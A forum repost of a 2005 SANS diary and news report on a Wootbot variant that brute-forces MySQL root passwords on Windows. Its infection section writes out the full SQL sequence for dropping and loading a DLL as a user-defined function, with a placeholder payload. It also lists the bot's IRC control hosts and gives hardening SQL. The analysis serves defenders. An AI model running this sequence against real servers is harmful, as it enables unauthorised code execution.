Posted on 01/27/2005 7:08:11 PM PST by Eagle9
Security experts are tracking a new malware variant, targeting the MySQL open-source database, which has likely infected thousands of Windows systems.
According to a report posted on the SANS Institute's Internet Storm Center site by SANS chief technology officer Johannes Ullrich, the attacking code is a variant of an existing strain of network "bot" known as "Wootbot." This variant is especially notable, said experts, since it is one of the first to target MySQL.
As with similar types of malware, the bot runs in the background, allowing MySQL to run normally while it contacts a remote Internet Relay Chat (IRC) server for additional instructions. In the report, Ullrich states that the bots' target IRC server was busy and unable to accept new connections when researchers last attempted to contact it. On earlier attempts, the IRC server showed around 8,500 connections, all of them likely due to infected MySQL installations.
According to Ullrich, the bot includes features often found in this type of malware, including a DDoS (Distributed Denial of Service) capability, backdoor access to the server, and instructions to gather software keys and other sensitive information. Currently, however, none of these features are active; the only action the bot takes is to scan the Internet and local networks looking for vulnerable MySQL installations to infect.
The bot surfaced Wednesday, when a developer on an Australian Web forum reported an unknown application named "spoolcll.exe" that repeatedly tried to contact an IRC server in Sweden.
The bot, Ullrich noted, does not exploit a weakness in the MySQL code; rather, it carries a list of common passwords and launches a brute-force attack to access the root MySQL account. Administrators who use strong passwords, allow root access only from the local host, and apply strict firewall rules are unlikely to be compromised, he stated.
Unix and Linux systems running MySQL currently are not at risk from this bot: the payload it drops is a Windows DLL. The password guessing and the user-defined-function (UDF) loading technique it relies on are not Windows-specific, so the same weak-root-account exposure applies on any platform.
MySQL, made by Swedish firm MySQL AB, is a popular open-source database often used to serve dynamically generated Web content or Web-based applications. According to MySQL AB, more than 5 million copies of the database are installed worldwide, including both Windows and non-Windows versions.
Appears to only affect Windows systems.
___________________________________________________
MySQL Bot
A "bot", exploiting weakly secured MySQL installs on Windows systems, has been spotted. It has infected a few thousand systems so far. As is typical for bots, infected systems connect to an IRC server. The IRC server instructs them to scan various /8 networks for other vulnerable MySQL servers.
Infection Method
The bot uses the "MySQL UDF Dynamic Library Exploit". In order to launch the exploit, the bot first has to authenticate to mysql as 'root' user. A long list of passwords is included with the bot, and the bot will brute force the password.
Once connected, the bot creates a table called 'bla' in the database 'mysql'. The 'mysql' database is used to store administrative information such as account passwords and privileges, and is part of every MySQL install. The only column in this table is a BLOB named 'line'.
Once the table is created, the executable is written into the table using an insert statement. Then the content of the table is written to a file called 'app_result.dll' using 'select * from bla into dumpfile "app_result.dll"'. The 'bla' table is dropped once the file is created.
In order to execute the 'app_result.dll', the bot creates a mysql function called 'app_result' which uses the 'app_result.dll' file saved earlier. This function is executed, and as a result the bot is loaded and run.
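The statement sequence described above, written out as SQL. This is an added reconstruction from the diary's description, not the bot's own code: the BLOB value is a constructed placeholder (the first bytes of a PE header), the hex-literal encoding of the binary and the RETURNS INTEGER clause are assumptions the diary does not spell out, and the session is assumed to already be authenticated as MySQL 'root' on a Windows server.

```sql
-- Added reconstruction of the infection steps (not the bot's code). Assumes a
-- MySQL 4.x server on Windows and a session already authenticated as 'root'.
USE mysql;

-- Staging table with a single BLOB column, exactly as the diary describes.
CREATE TABLE bla (line BLOB);

-- The DLL is delivered as the row's value. A hex literal is one way to carry
-- raw bytes in an INSERT; the value here is a constructed placeholder, not a
-- real DLL (a real one would be tens of kilobytes).
INSERT INTO bla VALUES (0x4D5A90000300000004000000FFFF0000);

-- INTO DUMPFILE writes the column's raw bytes with no escaping and no line
-- terminators, which is what makes it usable for dropping a binary. The
-- server process writes the file, so it lands on the server with the
-- privileges of the mysqld service account.
SELECT * FROM bla INTO DUMPFILE 'app_result.dll';

-- Clean up the staging table so nothing obvious is left in the 'mysql' database.
DROP TABLE bla;

-- Registering a UDF makes mysqld load the library into its own process; the
-- first call runs the attacker's code as the service account (often SYSTEM on
-- Windows installs of that era). The return type is an assumption.
CREATE FUNCTION app_result RETURNS INTEGER SONAME 'app_result.dll';
SELECT app_result();
```

Two practical caveats. Every step needs privileges that only an administrative account normally has (writing files with INTO DUMPFILE requires the FILE privilege, and CREATE FUNCTION inserts into mysql.func), which is why the bot must first guess the root password rather than exploit a bug. And MySQL releases later than the ones current in 2005 only load UDF libraries from the configured plugin_dir, so the dumped file would have to be written there for the final step to succeed.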
Post Infection Behavior
The bot will now try to connect to one out of a number of IRC servers:
dummylandingzone.hn.org -> 212.105.105.214
these have been disabled by the respective dynamic DNS providers (thanks!):
landingzone.ath.cx -> 212.105.105.214
dummylandingzone.dyndns.org -> no such name
landingzone.dynamic-ip.us -> was: 212.105.105.214
dummylandingzone.dns2go.com -> 63.64.164.91 and 63.149.6.91
dummylandingzone.hn.org -> 212.105.105.214
dummylandingzone.dynu.com -> 212.105.105.214
zmoker.dns2go.com -> 63.64.164.91
landingzone.dynu.com -> was: 212.105.105.214
dummylandingzone.ipupdater.com -> 212.105.105.214
The bot will connect to the IRC server on port 5002 or 5003. At this point, the IRC servers appear busy and unable to accept new connections. Note that dynamic DNS services are used, so the IP addresses will likely change. The last time we were able to connect, about 8,500 hosts were connected to the IRC server.
The bot will connect to a channel called '#rampenstampen' using the key 'gratisporn'. The topic of the channel is set to '!adv.start mysql 80 10 0 132.x.x.x -a -r -s'. This will instruct the bot to scan random ips in '132.0.0.0/8' for mysql server. Throughout our observation, the topic was changed regularly. To be scanned networks included 10.0.0.0/8, likely an attempt to infect other mysql servers within a local network that is otherwise protected by a firewall.
So far, the bot has been identified as a version of 'Wootbot'. It appears to include the usual set of bot features such as a DDoS engine, various scanners, and commands to solicit information from infected systems (e.g. system stats, software registration keys and such). The bot provides an FTP server and a backdoor (details later; it appears to be listening on port 2301/tcp and 2304/tcp, maybe other ports).
Mitigation
This bot does not use any vulnerability in MySQL. The fundamental weakness it uses is a weak 'root' account password. The following mitigation methods will prevent exploitation:
Strong Password: Select a strong password, in particular for the 'root' account.
Restricted root account: Connections for any account can be limited to certain hosts in MySQL. This is in particular important for 'root'. If possible, 'root' should only be allowed to connect from the local host. MySQL can also be told to accept an account only over its own SSL transport (the REQUIRE SSL clause of GRANT).
Apply firewall rules: MySQL servers should not be exposed to the "wild outside". Block port 3306 and only allow access from selected hosts that require such access. Again, the use of ssh forwarding or SSL is highly recommended.
For a one page cheat-sheet explaining how to setup passwords and disable network access in mysql, see:http://isc.sans.org/papers/secwinmysql.pdf
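The three mitigations above, applied and checked from the mysql client. This is an added example, not part of the diary or the SANS cheat sheet: the passwords are placeholders, the 'webapp' account, the 'appdb' database and the 10.0.0.5 address are made up for illustration, and the privilege-table columns used are those of MySQL 4.x/5.0.

```sql
-- Added hardening and audit script (not from the diary). Run locally on the
-- server as 'root'. Account names, database name, host address and passwords
-- below are placeholders chosen for the example.

-- Audit first: accounts reachable from any host, blank passwords, anonymous
-- users, and accounts holding the FILE privilege that INTO DUMPFILE needs.
SELECT user, host, File_priv
  FROM mysql.user
 WHERE host = '%' OR password = '' OR user = '' OR File_priv = 'Y';

-- 1. Strong password. The bot works from a fixed wordlist, so a long random
--    password that is not in any list defeats it outright.
SET PASSWORD FOR 'root'@'localhost' = PASSWORD('Xq7!vR2#mL9pWz4$placeholder');

-- 2. Root only from the local host: remove every other root entry, and the
--    anonymous accounts that Windows installers of the time created by default.
DELETE FROM mysql.user WHERE user = 'root' AND host <> 'localhost';
DELETE FROM mysql.user WHERE user = '';

-- Accounts that must connect over the network get a single source host,
-- only the privileges they need (no FILE, no access to the 'mysql' schema),
-- and are forced onto MySQL's own SSL transport.
GRANT SELECT, INSERT, UPDATE, DELETE ON appdb.* TO 'webapp'@'10.0.0.5'
      IDENTIFIED BY 'another-placeholder-password' REQUIRE SSL;

-- Direct edits to the privilege tables take effect only after a reload.
FLUSH PRIVILEGES;

-- Post-infection check: a UDF registered with CREATE FUNCTION is recorded in
-- mysql.func, so on an infected server this lists 'app_result' and its DLL.
SELECT name, dl FROM mysql.func;
```

Item 3 of the list, the firewall rule, belongs outside the database: block 3306/tcp inbound except from the hosts that appear in the GRANT statements, and if no other host needs the database at all, put skip-networking under [mysqld] in my.ini so mysqld does not listen on a TCP port in the first place. The final SELECT on mysql.func is worth running on any Windows MySQL server that was reachable from the Internet with a guessable root password, since the dropped DLL and the registered function survive a restart of the service.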
Detection
The port 3306 scanning should be quite obvious. If an infected host is not able to connect to the IRC server, you will still see port 5002 and 5003 connection attempts to the hosts shown above. If you have query logging configured on your DNS server, you will see lookups for the hostnames shown above. Note that the IPs will likely change over time.
Most antivirus scanners will detect the binary. Summary from Virustotal (as of 12:45 pm EST):
AntiVir 6.29.0.8/20050127 found nothing
AVG 718/20050127 found [BackDoor.Wootbot.4.S]
BitDefender 7.0/20050127 found nothing
ClamAV devel-20041205/20050127 found nothing
DrWeb 4.32b/20050127 found [Win32.HLLW.ForBot.based]
eTrust-Iris 7.1.194.0/20050127 found nothing
eTrust-Vet 11.7.0.0/20050127 found nothing
F-Prot 3.16a/20050127 found nothing
Kaspersky 4.0.2.24/20050127 found [Backdoor.Win32.Wootbot.gen]
NOD32v2 1.985/20050127 found [probably unknown NewHeur_PE]
Norman 5.70.10/20050127 found [W32/SDBot.gen2]
Panda 8.02.00/20050127 found nothing
Sybari 7.5.1314/20050127 found [Backdoor.Win32.Wootbot.gen]
Symantec 8.0/20050127 found [W32.Spybot.Worm]
Credits
Thanks to Evan for providing the sample of Spoolcll.exe (md5sum 18d3fe6ebabc4bed7008a9d3cb3713b9), our malware list, in particular Joe Stewart of LURHQ (http://www.lurhq.com ), our handlers, and the members of the Whirlpool forum (http://forums.whirlpool.net.au/forum-replies.cfm?t=291921 ).
--------
Johannes Ullrich (filling in for Deb Hale)
w00t
ping
AVG found it here, couple of days ago, I go all over, run a scan twice daily. I thought it said "woodbot", but with My old eyes I'm never sure. I could log on and the stuff would just go flying out without any input from Me. I ordered SP2, way back last August, it got lost in the mail, finally got the disc yesterday, after a phone call to MS, this old computer is working better today. I started having weird problems just about the time MS started pushing SP2 really hard, go figure! I was crashing 2 or 3 times a day, seems to be fine now. No more ooogly popups!
malware Ping--though this probably won't affect many users here on FR.
The foreign freeware mySQL is the problem. AND this has already been posted.
http://www.freerepublic.com/focus/f-chat/1330243/posts
This bug is less serious than Blaster was for MS-SQL, as it's basically just a brute force attack on databases that allow root. This is like saying if someone allows external connections to a MSSQL database and I brute force their abc123 password it's a problem with MSSQL..
I have to disagree with you again here. The worm inserts itself by using a brute-force method of trying common passwords until one works. There is no vulnerability in the software itself--just the admins who administer it.
Right, unless a Windows user happens to be running the MySQL software, which I am not.
At least it's not as bad as the Slammer worm that took out so many MSSQL installations, an entire government got mad. BTW, it only works on Windows, while the "foreign freeware" Linux installation is immune.